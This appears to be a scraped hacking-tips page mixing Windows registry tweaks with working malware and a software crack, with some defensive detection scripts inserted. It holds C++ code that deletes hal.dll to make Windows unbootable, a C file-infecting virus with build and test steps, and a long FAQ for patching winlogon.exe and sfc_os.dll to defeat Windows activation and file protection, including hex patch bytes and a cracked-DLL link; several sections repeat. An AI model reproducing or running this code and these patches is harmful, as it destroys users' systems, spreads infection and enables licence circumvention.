C++ virus
This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.
The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know
Virus in c
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
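Seen from the detection side, the copy loop above leaves every affected file beginning with the same bytes, whatever its extension. The following added example (not code from the original page) groups the files in a directory by a hash of their leading bytes and flags clusters that start with an `MZ` executable header under non-executable extensions; the function names, the 2048-byte window, the extension list and the sample files are assumptions made for the demonstration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

PREFIX_LEN = 2048  # assumption: compare the first 2 KiB of each file
EXECUTABLE_EXTS = {".exe", ".dll", ".com", ".sys", ".scr"}  # assumed list


def find_overwrite_clusters(directory, prefix_len=PREFIX_LEN, min_group=3):
    """Group regular files by the SHA-256 of their first prefix_len bytes.

    Returns one finding per group of at least min_group files that share
    an identical prefix. Genuine duplicate copies are reported too, so the
    'mismatched_types' field is the stronger signal: files that begin with
    an MZ header but do not carry an executable extension.
    """
    groups = defaultdict(list)
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        if entry.stat().st_size < prefix_len:
            continue  # shorter than the window, nothing to compare
        with open(entry.path, "rb") as fh:
            head = fh.read(prefix_len)
        groups[hashlib.sha256(head).hexdigest()].append((entry.name, head[:2]))

    findings = []
    for digest, members in groups.items():
        if len(members) < min_group:
            continue
        names = sorted(name for name, _ in members)
        exts = {os.path.splitext(n)[1].lower() for n in names}
        mz = members[0][1] == b"MZ"
        findings.append({
            "prefix_sha256": digest,
            "files": names,
            "mz_header": mz,
            "mismatched_types": sorted(exts - EXECUTABLE_EXTS) if mz else [],
        })
    return findings


def build_constructed_sample(directory):
    """Write inert, constructed test files: three share a prefix, three do not."""
    shared = b"MZ" + bytes(range(256)) * 8  # 2050 constructed bytes, not a program
    samples = {
        "report.txt": shared + b"tail-a",
        "photo.jpg": shared + b"tail-b",
        "tool.exe": shared,
        "notes.txt": b"plain text\n" * 300,
        "other.exe": b"MZ" + b"\x00" * 3000,
        "small.txt": b"hi",
    }
    for name, data in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(data)


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        return find_overwrite_clusters(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding["files"], "MZ header:", finding["mz_header"],
              "unexpected types:", finding["mismatched_types"])
```

A cluster with a non-empty `mismatched_types` list is worth isolating and restoring from backup; overwritten files cannot be repaired in place because the original leading bytes are gone.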
Remove Brontok Virus Yourself
It's the most sticky virus...
You can remove it.
Be an ethical hacker.
It works!
Start your computer in safe mode with command prompt and type the following command to enable the registry editor:
reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run it again for HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
After this your registry editor is enabled.
Type explorer.
Go to Run and type regedit,
then follow this path:
HKLM\Software\Microsoft\Windows\Currentversion\Run
On the right side, delete the entries which contain the words 'Brontok' and 'Tok-'.
After that, restart your system.
Open the registry editor and follow this path to enable Folder Options in the Tools menu:
HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
Delete this entry and restart your computer.
Then search for *.exe files in all drives (search in hidden files also)
and remove all files which are displayed with a folder icon.
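The registry checks in the steps above can be run as a single triage pass over saved `reg query` output. This is an added example, not part of the original page: the function names and the sample output (including the `Tok-Example` entry and its path) are constructed, and the policy value is matched by prefix so that both the page's 'NoFolderOption' spelling and `NoFolderOptions` are caught.

```python
import re

# A value line of `reg query` output: indented name, REG_* type, data.
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*)$")
RUN_MARKERS = ("brontok", "tok-")  # the two strings the page says to look for
POLICY_PREFIXES = ("disableregistrytools", "nofolderoption")

# Constructed sample, shaped like `reg query <key>` output for three keys.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SoundDriver    REG_SZ    C:\Program Files\Audio\snd.exe
    Tok-Example    REG_SZ    "C:\Documents and Settings\demo\Application Data\sample.exe"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableRegistryTools    REG_DWORD    0x1

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoDriveTypeAutoRun    REG_DWORD    0x91
    NoFolderOptions    REG_DWORD    0x1
"""


def parse_reg_query(text):
    """Yield (key, value_name, value_type, data) tuples from reg query text."""
    key = None
    for line in text.splitlines():
        if line.upper().startswith("HKEY_"):
            key = line.strip()
            continue
        match = VALUE_RE.match(line)
        if match and key:
            yield key, match["name"], match["type"], match["data"].strip()


def _dword_is_set(value_type, data):
    """True for a REG_DWORD whose data is non-zero (reg prints it as 0x...)."""
    try:
        return value_type == "REG_DWORD" and int(data, 16) != 0
    except ValueError:
        return False


def triage(text):
    """Return (kind, key, value_name) findings for the page's indicators."""
    findings = []
    for key, name, value_type, data in parse_reg_query(text):
        lowered_key = key.lower()
        if lowered_key.endswith(r"\currentversion\run"):
            haystack = (name + " " + data).lower()
            # Substring match as on the page; review hits by hand, since
            # a short marker such as "tok-" can match unrelated entries.
            if any(marker in haystack for marker in RUN_MARKERS):
                findings.append(("autorun", key, name))
        elif r"\currentversion\policies" in lowered_key:
            if name.lower().startswith(POLICY_PREFIXES) and _dword_is_set(value_type, data):
                findings.append(("policy-lockout", key, name))
    return findings


if __name__ == "__main__":
    for kind, key, name in triage(SAMPLE):
        print(f"{kind:15} {name:22} {key}")
```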
Want to remove shared documents folder from My Computer window
tip:
Some don't like the My Shared Documents folder option. If you are one of them, here is a trick to remove it. Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\My Computer\NameSpace\DelegateFolders. You should see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the My Shared Documents folder.
Lock your USB port
To do this you have to make a registry tweak that will prevent writing to the USB port in Windows XP.
1) Go to 'Start|Run' and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New|Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value, label it WriteProtect, give it a value of '1'.
6) Now users will not be able to write any data on the USB.
To turn it off just set the value to '0'
Lock Unlock Folder Using .bat file
Suppose you want to lock the folder games in d: which has the path D:\Games. In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat
create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat
Now you can see 2 batch files, loc and key. Press loc and the folder games will change to control panel and you cannot view its contents. Press key and you will get back your original folder.
try it out!!!!!!!
How to remove recycle bin from your desktop
Tip:
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
How to improve on shutdown time? Close apps automatically & quickly at shutdown
tip:
Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. That's all. Furthermore, you can reduce the time it takes for Windows to issue the kill directive to all active/hung applications.
In doing this, the only constraint you should make sure holds is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the value of WaitToKillAppTimeout to, say, 3500 (since the default value for HungAppTimeout is 5000 and for WaitToKillAppTimeout is 20000).
GENUINE windows activation tricks
I personally don't like doing this, but one can't deny the possibilities around.
This article, I guess, solves all the enigma for the users surfing day and night in search of
the keyword "Windows Xp hack", including specialized setups.
This is not recommended and you must use genuine software,
especially the operating systems!!
-======================================-
Windows 2003 & XP & LH
Anti Product Activation
-======================================-
The crack will patch some bytes in your
winlogon.exe and totally disable the
Windows Product Activation Check.
Tested with winlogon.exe build:
Windows XP 2600.0 (Retail)
Windows 2K3 3790.0 (Retail)
Windows XP 2600.2180 (SP2 RTM)
Windows XP 2600.1106 (SP1)
Windows 2K3 3790.1218 (8.7.2004)
Windows Longhorn 4008 or 4015(not tested by myself)
This version uses a generic patch engine
which supports all current version of Windows
and hopefully all future ones. :)
The Options
===========
1. Read all about the options.
2. Don't change anything you without a reason.
* Apply OOBE Fix
This applies the Out Of Box Experience ->OOBE Patch
which removes the 'Activate Windows' link from the
start menu and makes the Activating Windows Dialog
saying 'Already Activated'
Note: This is more a cosmetically fix and really not
needed for the patch to work properly.
* Apply WPA Fix
This removes the WPA-Check in Winlogon.exe.
If you want to get rid of the Windows Activation
this MUST be Enabled !
Disable this if you just want to undo the OOBE-Fix.
Note: However you can use this program also to
decrypt and unprotect other MS-Files
like DPCDLL.dll or LICDLL.DLL. So if you
do so disable this option.
* Remove selfcheck blocks
If you press the 'Apply' Button the self checks are always
disable by 'correcting' the pointer.
This option will additionally overwrite the self check block
calls in the program code with the Value 90 (NOP=No OPeration)
and will improve the readability of disassembly.
Note: This option is absolutely not necessary for the patch to work.
* Remove crypt blocks
This will decrypt the crypt program parts of the input file and
write them back to into the exe and do some other fixes to keep the
File executable. If you want to disassemble the file enable this one.
Note: This option is absolutely not necessary for the patch to work.
* Debug: Save decrypted code to *.bin
Writes each decrypted program parts into a file with the
address as filename looking like this: 2C18D.bin, 3678B.bin...
* Debug: Save decrypted code to exe
Writes each decrypted program parts back into the file.
If the option 'Remove crypt blocks' is not check just the decrypted
RAW-Output is written into the exe. (After you enable this you
have to right click on 'Apply/Browse' and open the file you want
to decrypt)
Note: This option is dangerous!
Without having 'Remove crypt blocks' option enabled this will
make crash the input file crash for sure.
This option is absolutely not necessary for the patch to work.
* Debug: Verbose Output
Output Debug information
This may be helpful to identify some problems.
==================================================
F A Q - Frequently Asked Questions
==================================================
????????????????????????????????????????????????????????????????????????????????
I after I have installed a Service pack an the Activation the
Activation Reminder -counting down the days- is shown again.
????????????????????????????????????????????????????????????????????????????????
You must reapply the patch every time after you installed a servicepack and
everything will be fine :)
Note: The Patch don't 'activated' Windows it only removes the check in winlogon.exe
which test if windows is activated or if it's still in the evaluation period
and force you to logoff if something is wrong.
When you install a servicepack winlogon.exe is normally overwritten by a new
Not patched Version. So you need reapply the patch...
Usually the servicepack reset the trial counter so it will restart at 30 days.
????????????????????????????????????????????????????????????????????????????????
I can't start patch because my evaluation period expired and
Now I'm unable to login.
????????????????????????????????????????????????????????????????????????????????
You can still login in safe mode even if your evaluation period expired.
Press F8 right after the Bios boot screen and select Safe Mode
(Without Network support) menu now windows should boot in safe mode and you can
Login and apply the Anti-WPA-Patch.
Note: Since no Network support is available in safe mode no Internet or Network
Is available so it's good to have the patch somewhere on the hard disk or on a
floppy disk...
If you select Safe Mode (with Network support) you are unable to login due to
Activation is necessary.
????????????????????????????????????????????????????????????????????????????????
I want to change my CD-Key - but msoobe.exe also says
'Already Activated' and don't show the Activation Dialog
????????????????????????????????????????????????????????????????????????????????
Enable option 'Apply OOBE Fix' and
Disable option 'Apply &WPA Fix' -to keep the WPA-Patch active-
then click on the 'Restore Backup' Button
PREVIOUS VERSIONS:
Start regedit and go to
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
Edit this and set Last Byte to FF.
Start this -if the Activation are delete- to show the Activation dialog:
%SYSTEMROOT%\system32\oobe\msoobe.exe /A
????????????????????????????????????????????????????????????????????????????????
Is it possible to integrate WPA_KILL.EXE in the WinXP setup-routine?
I have a WinXP pro setup CD (sp2 integrated).
????????????????????????????????????????????????????????????????????????????????
Integrating the AntiWPA Patch in the Windows Setup:
1. Extract [WindowsSetupDir]\i386\winlogon.ex_ to a temporary Dir.
(Winrar or winace will do the job - or rename it to winlogon.cab and
double-click on it - to use the build-in WindowsCabExtract)
2. Apply the WPA Crack to the file.
Right click on 'Apply/Browse' and choose the file.
(To unlock all buttons of the WPA-Patch right click on 'Quit')
3. Repack winlogon.exe an put it back in the installation folder
Use Winace (and choose MS-Cab as compression method) and name
the packed cab-file winlogon.ex_.
Or use the makecab.exe(included in Windows XP) start cmd.exe in the dir
winlogon.exe is in and Enter:
makecab winlogon.exe
After that you will get winlogon.ex_ as output.
PREVIOUS VERSIONS:
In previous versions the PE Checksum of the file wasn't updated by the patch.
This caused setup to reject winlogon.exe during installation.
But this has been fixed in this version.
Manually OOBE_Fix for WindowsSetup
----------------------------------
Since I see people integrating the patched winlogon.exe into windows setup are
perfectionist here's a hint how to may you get rid of the activationlinks in
the startmenu (-untested-):
Ok unpack and edit syssetup.inf
1. search for
[StartMenuCommon]
and delete this to avoid the activate link in START
%oobe_desc% = oobe\msoobe.exe,"%%SYSTEMROOT%%\system32\oobe\msoobe.exe /A",,0,"@%SystemRoot%\system32\oobe\msoobe.exe,-2001","%SystemRoot%\system32\oobe\msoobe.exe",2000
(btw you can also delete this unless %windowscatalog% link section if you like)
2. In SystemTools it's the same
[SystemTools]
%oobe_desc% = oobe\msoobe.ex...
Just for better understanding the inf-file format at the end is defined what the variable "oobe_desc" is:
oobe_desc = "Windows aktivieren"
This was were I first stepped when I searched for "Windows aktivieren" in C:\windows
The second was to look for oobe_desc...
No-CDKey-Patch for WindowsSetup
-------------------------------
- Since I got some positiv feedback about this I decided to publish this.
But so far I'ven't test it myself-
This will make the WindowsSetup to accept any -even a blank- CDKey
Get "http://antiwpa.cjb.net/Other/cracked pidgen for setup.rar"
Pack it pidgen.dll with cab-pack to pidgen.dl_ as decribed above
and put it in the I386 setupdir.
That's it.
??????????????????????????????????????????????????????????????????????????????????
What changes does this patch to my System and how to undo it?
????????????????????????????????????????????????????????????????????????????????
1. It modifies c:\WINDOWS\system32\Winlogon.exe and creates a
backup named Winlogon.bak
UNDO: Rename Winlogon.exe -> Winlogon.OUT
Rename Winlogon.bak -> Winlogon.exe
After Reboot you will be able to delete Winlogon.OUT if you like
2. The RegistryValue
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
is set to a fixed value as it is activated.
UNDO: Edit this with Regedit and set Last Byte to FF.
This will 'DeActivate' Windows
Note: Normally this value is written (not read!) by winlogon.exe on
every start up just as information for MSOOBE.
This value has no effect on the real Activation.
3. The 'Activate Windows' Link from the Startmenu is remove
UNDO: Start\Execute:
rundll32 setupapi,InstallHinfSection RESTORE_OOBE_ACTIVATE 132 syssetup.inf
Other Changes:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath" and "ServicePackSourcePath" will be temporary delete during the patch
and (if nothing real bad happens) restored if it's finished.
????????????????????????????????????????????????????????????????????????????????
How to set another path to Winlogon.exe?
????????????????????????????????????????????????????????????????????????????????
Right click on the 'Apply/Browse' button.
If the Patch is already and the 'Apply/Browse' button is greyed out
Right click on the 'Quit' button to force unlock all buttons.
Note: You can also use the Windows Anti WPA Patch to de-protect
(Remove SelfCheckBlock SCB) from other protected
Microsoft exe and dll's:
For ex: licdll.dll, DPCDLL.dll or Windows PLUS! Pack Executables
Of course the WPA-Patch is skipped in this case.
????????????????????????????????????????????????????????????????????????????????
The Patch doesn't work after I rebooted, the WPA Reminder pops up again.
Also during the Patch the Windows Systemfile Protection Dialogbox didn't
come up.
????????????????????????????????????????????????????????????????????????????????
Maybe the Patch was undone by the Windows File Protection.
To check if the patch is still active start the Windows Anti WPA Patch again and check if it says 'Patch already applied'.
????????????????????????????????????????????????????????????????????????????????
How to disable this damn Windows File Protection(WFP)?
????????????????????????????????????????????????????????????????????????????????
There is no really official way to disable this
This is an undocumented setting worked for recent windows versions:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable=0xffffff9d
BUT: It was removed in Windows 2000 Service Pack 2 and in Windows XP!
When you restart your computer, the System event log will contain Event ID 64032, "Windows File Protection is not active on this system."
SFCDisable (REG_DWORD)
0 = enabled (default - WinXP Professional)
1 = disabled, prompt at boot to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
2 = disabled at next boot only, no prompt to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
4 = enabled, with popups disabled (default - for all Server Windows)
More about this and how to re-enable the 'SFCDisable=0xffffff9d-setting'
-> http://www.collakesoftware.com/aboutwfp.htm
To make this more flexible here is a search'n'replace patch:
(Rename sfc_os.dll to sfc_os.OUT; copy sfc_os.OUT to sfc_os.dll)
Open sfc_os.dll in a hex editor
Search for : 83 f8 9D 75 08 33 C0 40
Replace with: 83 f8 9D EB 08 33 C0 40
So this is where it comes from:
A1 D8E1C376 MOV EAX, [SFCDisable]
Patch- > 83F8 9D CMP EAX, -63 ; = 0xffffff9d !
Search > 75 08 JNZ SHORT Don't_Set_SFCDisable_=_1
Data > 33C0 XOR EAX, EAX
> 40 INC EAX
A3 D8E1C376 MOV [SFCDisable], EAX
:Don't_Set_SFCDisable
Btw this fragment is the reason 0xffffff9d don't work anymore - so alternatively Nop Out (=overwrite with 0x90) that bastard
Well I found a real simple way to disable this for sure:
Rename c:\WINDOWS\system32\sfc.dll to sfc-OUT.dll to something else
After Reboot the WFP is disabled.
BUT I advice to rename sfc-OUT.dll back to sfc.dll soon because I notice
that you can't install any new hardware device driver because syssetup.dll
statically imports sfc.dll and fail to load if sfc.dll is not found.
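For integrity checking, the byte sequences quoted above make it possible to tell whether the compare site in a copy of sfc_os.dll still carries its conditional branch. This is an added example, not code from the original page or from the patch author: the function names and the sample buffers are constructed, and only the byte values are taken from the text.

```python
import re

# 83 F8 9D  CMP EAX,-63   followed by a 2-byte branch, then 33 C0 40.
# The two branch bytes are captured so that any modification is visible.
SITE_RE = re.compile(rb"\x83\xf8\x9d(..)\x33\xc0\x40", re.DOTALL)
BRANCH_STATES = {
    b"\x75\x08": "intact",   # JNZ SHORT, the sequence the page searches for
    b"\xeb\x08": "patched",  # JMP SHORT, the sequence the page writes
}


def check_compare_site(image):
    """Return [(offset, state)] for every compare site found in the image."""
    return [
        (match.start(), BRANCH_STATES.get(match.group(1), "unexpected"))
        for match in SITE_RE.finditer(image)
    ]


def verdict(image):
    """Summarise an image as 'intact', 'tampered' or 'not-found'."""
    sites = check_compare_site(image)
    if not sites:
        return "not-found"
    return "intact" if all(state == "intact" for _, state in sites) else "tampered"


def verdict_for_file(path):
    """Read a file from disk (for example a copy of sfc_os.dll) and classify it."""
    with open(path, "rb") as fh:
        return verdict(fh.read())


# Constructed buffers standing in for file contents; not real DLL data.
_PAD = bytes(32)
SAMPLE_INTACT = _PAD + bytes.fromhex("83f89d750833c040") + _PAD
SAMPLE_PATCHED = _PAD + bytes.fromhex("83f89deb0833c040") + _PAD
SAMPLE_OTHER = _PAD + bytes.fromhex("83f89d909033c040") + _PAD

if __name__ == "__main__":
    for label, blob in (("intact", SAMPLE_INTACT),
                        ("patched", SAMPLE_PATCHED),
                        ("other", SAMPLE_OTHER)):
        print(label, check_compare_site(blob), verdict(blob))
```

A `not-found` result is inconclusive, since other builds may compile this check differently; comparing the file's hash or signature against a known-good copy remains the authoritative test.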
?????????????????????????????????????????????????????????????????????????????????????????????
The Patcher doesn't find any offset. / Known problem on Asian systems.
?????????????????????????????????????????????????????????????????????????????????????????????
WPA_KILL.EXE currently don't work with Asian Systems (Taiwan , Japan ...) with DBCS (Double Character Set)
enabled. If you have such systems disable DBCS or patch your winlogon.exe on a non DBCS system
apply the patch and copy it back in your system.
As far as I found out the Test Version function does not work properly and you get 'unknown Version'.
A Workaround that might work is to use the offset locator to detect/set the right offset manually.
(Hint: Compare the detected offset with the known-offset-list)
The problem is related to some improper char handling and/or comparing inside FrmMain.Test() i.e FileStream::FixedString()
Everyone how has an Asian System and MSOffice(Note: VBA is always also installed together with MSO) or Visual Basic 6 is welcome to invite me to a remote Session. - so I can examine and fix that problem - Please send me an email...
And of course you're also welcome to fix it yourself:
\other\cracknfo\problem-onasian-systems.rar
\SRC\antiwpa-1.6.2-winxp-2k3-src.zip
?????????????????????????????????????????????????????????????????????????????????????????????
How you access/modify the winlogon.exe file while the winlogon process is running ?
I only saw you are using standart API calls but I must have missed something...
???????????????????????????????????????????????????????????????????????????????????????????
How to modify a File (like winlogon.exe) while it is in use:
1.Rename winlogon.exe -> winlogon.bak
That's the most important thing about that. You can't delete or
modify a file that's in use, but you can RENAME it! (under Win9x
this don't work. But there you can rename the dir the file is in...)
2.Copy winlogon.bak -> winlogon.exe
3.Now you can edit winlogon.exe. Of course you can't delete (or
modify) winlogon.bak as long as it is in use.
But you surely want to keep an backup of it, don't you?
Oh I almost forgot to mention an other annoy thing:
>The Windows system File Protection (WFP) 'D:\installs\WinXP_SP2.out'
So the WFP won't file them to restore
Well the WPA-Patch doesn't rename your Windows installation path it deletes temporary the path to this in you registry and restores it after the patch (actually after you clicked on the OK button of the messagebox).
These Registry paths are:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath"= "D:\installs\WinXP_CD"
"ServicePackSourcePath" ="D:\installs\WinXP_SP2"
----------------------------------------------------------
Just a hint to see if the patch worked without to Reboot:
1.Apply the patch
2.Logon as an other user
(But don't log of - choose change/disconnect user)
3.When you login just see if the patch works...
... or if not this damn
'You haven't activated your Windows yet...' message
(4.If you logoff the first user now 'winlogon.bak' is no long in use
and you can delete/modify it)
Ah and to get a better overview about the processes which are running on your machine use this: http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
And next time you can't delete a files use 'search handle' and enter the filename then close the handle(=file) or kill the process...
?????????????????????????????????????????????????????????????????????????????????????????????
Does the AntiWPA Crack make winlogon.exe unstable?
?????????????????????????????????????????????????????????????????????????????????????????????
Since the WPA 1.6.2 disables all anti crack self checks in winlogon.exe it may execute some msec faster :)
The patch simply makes winlogon.exe to skip the function which will do the WPA-Check( update of WPA Trialcounter)
and block any login if the result is 'negative'.
From 'outside' this windows is simple not activated but as long your using a valid CDKEY Windows update will work and is not affected by the WPA-Patch
> does the patch make winlogon.exe unstable?
No. If it is applied correctly winlogon.exe will not become unstable/crash.
(The only time winlogon.exe becomes unstable is after appling wpa-kill 1.1 to WinXP SP1 - but this bug was fix in version 1.2...)
Of course with the wrong offset in offset locator you can make winlogon.exe unstable/crash or by killing the patcher during the patch is applied.
????????????????????????????????????????????????????????????????????????????????
PREVIOUS VERSIONS:
I got 'ERROR: Unknown Version of winlogon.exe'.
Can you include this version in your WPA-Patcher ?
????????????????????????????????????????????????????????????????????????????????
Well please try the offset locator button to patch this new Version. Since Version 1.4 I added a heuristic search for offset locator which should find the right offset by default and highlight it.
So -after you read the warning- just double click on the highlight Offset on the List to set this as new patch-Offset.
If this is not a Beta or Release Candidate Version send me your -unpatched- Winlogon.exe by email and add if the default offset (found by the for offset locator) works.
????????????????????????????????????????????????????????????????????????????????
PREVIOUS VERSIONS:
The patch don't work - if i click on the 'Activate Windows' link in the
start menu, it says Windows isn't activated and that there are only xx days left.
????????????????????????????????????????????????????????????????????????????????
This patch didn't stop the trial counter nor will it 'Activate' your Windows.
The WPA-Patch fixes the condition jump which decides whether windows was started in safe mode
and the activation check should be skipped or if it was started in normal mode and it should be done.
So in short it will make winlogon.exe to skip the is-Windows-activated check when you logon.
To see if the patch work wait about one minute after you logon -
if the Activation reminder balloon in the tray bar DON'T pop up - the patch IS working.
Some other things to see that it works
The messagebox that reminders you to active if there are only 5 days left and
The messagebox that says you're not allowed to logon until you active will be away.
So patching msobmain.dll just to make it say it's activated is only additional overheat and
also may cause some problems. Maybe if you want to change your CDKey and you don't reach the CDKEY change dialog because it says already activated...
Ok what I need to do is to include some FAQ-info text in the next version about that issue.
Maybe I will add a "Let's Activate Windows" force true patch if there is such a big need for this
I mean if this will make someone sleeps better at night - is enough for a good reason.
This article i guess solve all the Enigma for the users surfing day and night in search of
keyword "Windows Xp hack" including specialized setups.
this is not recommended and u must use the genuine Softwares
especially the Operating Systems!!
-======================================-
Windows 2003 & XP & LH
Anti Product Activation
-======================================-
The crack will patch some bytes in your
winlogon.exe and totally disable the
Windows Product Activation Check.
Tested with winlogon.exe build:
Windows XP 2600.0 (Retail)
Windows 2K3 3790.0 (Retail)
Windows XP 2600.2180 (SP2 RTM)
Windows XP 2600.1106 (SP1)
Windows 2K3 3790.1218 (8.7.2004)
Windows Longhorn 4008 or 4015(not tested by myself)
This version uses a generic patch engine
which supports all current version of Windows
and hopefully all future ones. :)
The Options
===========
1. Read all about the options.
2. Don't change anything you without a reason.
* Apply OOBE Fix
This applies the Out Of Box Experience ->OOBE Patch
which removes the 'Activate Windows' link from the
start menu and makes the Activating Windows Dialog
saying 'Already Activated'
Note: This is more a cosmetically fix and really not
needed for the patch to work properly.
* Apply WPA Fix
This removes the WPA-Check in Winlogon.exe.
If you want to get rid of the Windows Activation
this MUST be Enabled !
Disable this if you just want to undo the OOBE-Fix.
Note: However you can use this program also to
decrypt and unprotect other MS-Files
like DPCDLL.dll or LICDLL.DLL. So if you
do so disable this option.
* Remove selfcheck blocks
If you press the 'Apply' Button the self checks are always
disable by 'correcting' the pointer.
This option will additionally overwrite the self check block
calls in the program code with the Value 90 (NOP=No OPeration)
and will improve the readability of disassembly.
Note: This option is absolutely not necessary for the patch to work.
* Remove crypt blocks
This will decrypt the crypt program parts of the input file and
write them back to into the exe and do some other fixes to keep the
File executable. If you want to disassemble the file enable this one.
Note: This option is absolutely not necessary for the patch to work.
* Debug: Save decrypted code to *.bin
Writes each decrypted program parts into a file with the
address as filename looking like this: 2C18D.bin, 3678B.bin...
* Debug: Save decrypted code to exe
Writes each decrypted program parts back into the file.
If the option 'Remove crypt blocks' is not check just the decrypted
RAW-Output is written into the exe. (After you enable this you
have to right click on 'Apply/Browse' and open the file you want
to decrypt)
Note: This option is dangerous!
Without having 'Remove crypt blocks' option enabled this will
make crash the input file crash for sure.
This option is absolutely not necessary for the patch to work.
* Debug: Verbose Output
Output Debug information
This may be helpful to identify some problems.
==================================================
F A Q - Frequently Asked Questions
==================================================
--------------------------------------------------------------------------------
After I installed a service pack, the Activation Reminder
(counting down the days) is shown again.
--------------------------------------------------------------------------------
You must reapply the patch every time you install a service pack, and
everything will be fine :)
